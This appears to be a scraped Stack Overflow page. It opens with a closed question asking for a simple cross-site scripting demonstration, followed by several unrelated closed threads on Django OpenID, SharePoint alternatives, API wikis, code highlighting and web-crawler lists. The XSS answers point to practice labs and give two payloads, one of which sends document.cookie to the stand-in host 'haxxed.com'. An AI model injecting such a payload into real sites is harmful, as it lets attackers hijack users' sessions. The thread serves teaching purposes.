A simple example of a Cross-site scripting attack [closed] - xss

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 4 years ago.
Improve this question
Can someone show me a Cross-site scripting attack in effect on my browser? Is there an example on the internet that does this? I haven't found this on the internet.
The simpler the example is the better.

See http://www.insecurelabs.org and http://www.insecurelabs.org/task/
Intentionally vulnerable to XSS in the search field and several other places.

<img src="javascript:alert('hello everybody')"></img>
The image tag that I inserted is a example of xss. the above src contains the java script alerting you.

You'll generally have to install your own server-side software for a live XSS example. Not many legitimate sites will open an XSS flaw intentionally to web surfers.
One ready-made piece of server-side software that lets you demonstrate XSS (among many other things) to yourself is OWASP's WebGoat. Here are instructions to install WebGoat and demonstrate XSS. You will find additional examples of program snippets that enable XSS in the OWASP article "Cross-site scripting (XSS)".

Simple Form would also be:
If the message box will show up, you know, that the page or the server is vulnerable.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
A great sample of how the technique works can be found here
https://www.hacksplaining.com/exercises/xss-stored

Related

Django-openauth-id documentation and installation guides [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 5 years ago.
Improve this question
On a few questions this package was recommended to provide Django with OpenAuth capabilities.
I'm new to Django and as one of my first projects, I'm trying to replicate StackOverflow's login and registration mechanisms. the only two documents that relate to the usability and installation of the package are the README and openid.txt files. edit I forgot to mention the example in their code base /endedit
I implemented what the files and example implemented, but so far I still feel lost in terms of actually understanding how the mechanism works and how to build a site with openauth-id integration.
The questions I have involve:
Best practice way to include multiple openID providers
Proper way to connect the to the Django-user models
Handling any security, privacy, etc issues that may arise
I have put up an example of using django-openid-auth with openid-selector(http://code.google.com/p/openid-selector/) for a nice UI on github. See if this helps.
https://github.com/rajasaur/openid_userprofiles
If something is not clear from the examples, please ask and Id be more than happy to help
Imho:
You need to include each ID provider in a separate Authentication backend.
Bast practice is also to use build in User model.
Look for example plugin that provides multiple authentication providers
django-social_auth at github.
Hope that will help...

SharePoint alternatives? [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 8 years ago.
Improve this question
Hi, I want to develop a site with the features similar to SharePoint but without using any SharePoint services.
Please advise me which are the tools I have to use to achieve this.
The alternative should be free and customizable.
Thanks.
If your question is: What is an alternative to sharepoint? then one answer would be "alfresco". Although I'm not a fan of Alfresco as a user, it has many features similar to sharepoint: different accessing methods for shared files (WebDAV, HTTP, FTP, SMB), authorization groups and file versioning / history.
Of course it lacks the tight office integration of Sharepoint.
Edit: I'm not a fan of Sharepoint either.
Depends on what you want to with SharePoint. If you are only using 1 functionality you probably have tons of alternatives. (Wordpress, wikipedia, Drupal,..). All with their own pro's and cons.
If you want the complete package. Collaboration , search, publishing, wiki, blog, office integration, etc... The choices are limited. I'm not a great fan of DotNetNuke but it's one possibility. More in the Java camp you find Alfresco.
Have a look here,
https://stackoverflow.com/questions/1096392/any-good-alternative-for-sharepoint-ofcourse-opensource
And there are some alternatives in this thread as well Open Source SharePoint?

Wiki software for documenting APIs [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 5 years ago.
Improve this question
What's an advisable way of documenting and sharing APIs (e.g. HTTP web-services)?
The requirements are:
A Wiki type system in which anyone can edit any page.
An easy way to write an API spec so that the styling/formatting is applied automatically, rather than having to manually add the styling for each individual page.
I would use Wordpress, except that it's not really a Wiki system; it's more of a blog engine. I want a nice, clean, structured hierarchy of pages, and the ability to click and edit instantly.
I tried Google Sites, but this also seems to be unsuitable, because it doesn't allow me to create a consistent style for APIs. The only control I have over styling is "themes", which change the look & feel of the whole site, and aren't specific enough.
I found a hosted solution here, but at $499 p/year I'm sure we can do better.
Any suggestions?
Many projects use trac. Here is an example of a project that uses it http://djangobb.org/wiki
Trac integrates together wiki, issue tracking and source control.
Might consider using something like doxygen to generate an inital snapshot and then just wikify that.
A similar question was posted here also: Wiki solution for APIs documentations?
and I suggested using MindTouch
**jonathan, just saw your comment about trac adding too much complexity. you'll likely find the same with MindTouch, but that's because you're asking for a solution to a specific problem, and the suitable tools available offer much more capabilities (ie complexities)

What's a good Wordpress extension for coloring C/C++/script code? [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 8 years ago.
Improve this question
My research group uses a Wordpress blog. Frequently I want post snippets or even entire short programs I've been working on to it, with most of my code being written in C/C++ or scripting languages (Bash, TCL, etc).
I figure that there have to be some good extensions to Wordpress to colorify code since so many people use it. I'm looking for something similar to StackOverflow's colorizing system, though I realize it may not be quite as robust!
Can you point me to some of your favorites/the ones you think are most reliable?
Thanks in advance!
This was the first I investigated when I started a Wordpress blog. You can use Wordpress' sourcecode shortcode, as exemplified here. It requires JavaScript on the client side (otherwise it renders as just preformatted text).
Cheers & hth.,
GeSHi is a good backend for highlighting lots of different languages. There are Wordpress plugins that support it, but I don't have a specific recommendation. (I use GeSHi for our wiki.)
You might also consider Pastie or Gist as a way to share snippets.

Is there a list of known web crawlers? [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 5 years ago.
Improve this question
I'm trying to get accurate download numbers for some files on a web server. I look at the user agents and some are clearly bots or web crawlers, but many for many I'm not sure, they may or may not be a web crawler and they are causing many downloads so it's important for me to know.
Is there somewhere a list of know web crawlers with some documentation like user agent, IPs, behavior, etc?
I'm not interested in the official ones, like Google's, Yahoo's, or Microsoft's. Those are generally well behaved and self-indentified.
I'm using http://www.user-agents.org/ usually as reference, hope this helps you out.
You can also try http://www.robotstxt.org/db.html or http://www.botsvsbrowsers.com.
I'm maintaining a list of crawler's user-agent patterns at https://github.com/monperrus/crawler-user-agents/.
It's collaborative, you can contribute to it with pull requests.
http://www.robotstxt.org/db.html is a good place to start. They have an automatable raw feed if you need that too. http://www.botsvsbrowsers.com/ is also helpful.
Unfortunately we've found that bot activity is too numerous and varied to be able to accurately filter it. If you want accurate download counts, your best bet is to require javascript to trigger the download. That's basically the only thing that is going to reliably filter out the bots. It's also why all site traffic analytics engines these days are javascript based.